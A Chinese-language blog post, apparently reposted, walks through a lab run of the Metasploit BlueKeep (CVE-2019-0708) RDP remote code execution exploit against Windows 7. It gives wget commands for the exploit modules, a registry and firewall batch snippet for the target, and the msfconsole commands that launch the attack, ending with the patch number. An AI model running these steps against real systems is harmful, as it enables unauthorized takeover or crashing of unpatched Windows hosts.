CVE-2019-0708遠程桌面服務遠程執行代碼漏洞exp利用過程


CVE-2019-0708遠程桌面服務遠程執行代碼漏洞

上邊這洞是啥我就不多說了,描述類的自行百度。

 

 

受影響系統版本范圍:

  • Windows Server 2008 R2

  • Windows Server 2008

  • Windows Server 2003(已停止維護)

  • Windows 7

  • Windows XP(已停止維護)

聽說前兩天有個exp:

  https://github.com/rapid7/metasploit-framework/tree/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp 

我借來玩了一下,大概玩法是這樣的:

  要有個環境,我用的win7sp1

  

 

     kali上我對我的整體環境進行了相關更新,以便更好匹配環境

  gedit sources.list

  apt-get update 

  apt-get install metasploit-framework

  gedit sources.list

  apt-get update && apt-get upgrade && apt-get dist-upgrade

  apt-get install metasploit-framework

  apt automove

  apt autoremove

  版本:

 

      我先看看我msf安裝的路徑在哪里。

  find / -name 'metasploit'

 

 找到/usr/share/下

然后這堆東西進行下載

首先,我們需要下載好攻擊套件放置文件到msf的相應文件夾(如果已存在同名文件,直接覆蓋即可)

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb 

放在/usr/share/metasploit-framework/lib/msf/core/exploit/  記住要替換

 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

放在/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

 

 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

放在/usr/share/metasploit-framework/modules/exploits/rdp,如果這里沒有rdp目錄,就用mkdir命令創建一個rdp目錄

 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

放在/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp如果這里沒有rdp目錄,就用mkdir命令創建一個rdp目錄

 

使用msfupdate、reload_all更新重載一下msf。

 

 就能找到剛才的文件了:

 

 要有3389

 

 關閉防火牆:

 

 哦對了,受害者機器還要剛好有一行注冊表:

@echo offcolor 1c sc config MpsSvc start= auto sc start MpsSvc reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

攻擊機ip:192.168.10.152  受害者ip:192.168.10.154

玩起我們的exp

use exploit/rdp/cve_2019_0708_bluekeep_rce 

set rhosts 192.168.10.154

set target 3  (可以使用show targets看一下,選適合自己環境的)

set forceexploit true

run

 

 藍了,多試幾次,有點不穩定

 

 嗯嗯嗯,有點不穩定,有點難用,不過還是有成功的時候,可以再等等新版本,沒更好用的之前先湊合用吧。

 

 

防御:

不多說,KB4495667


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM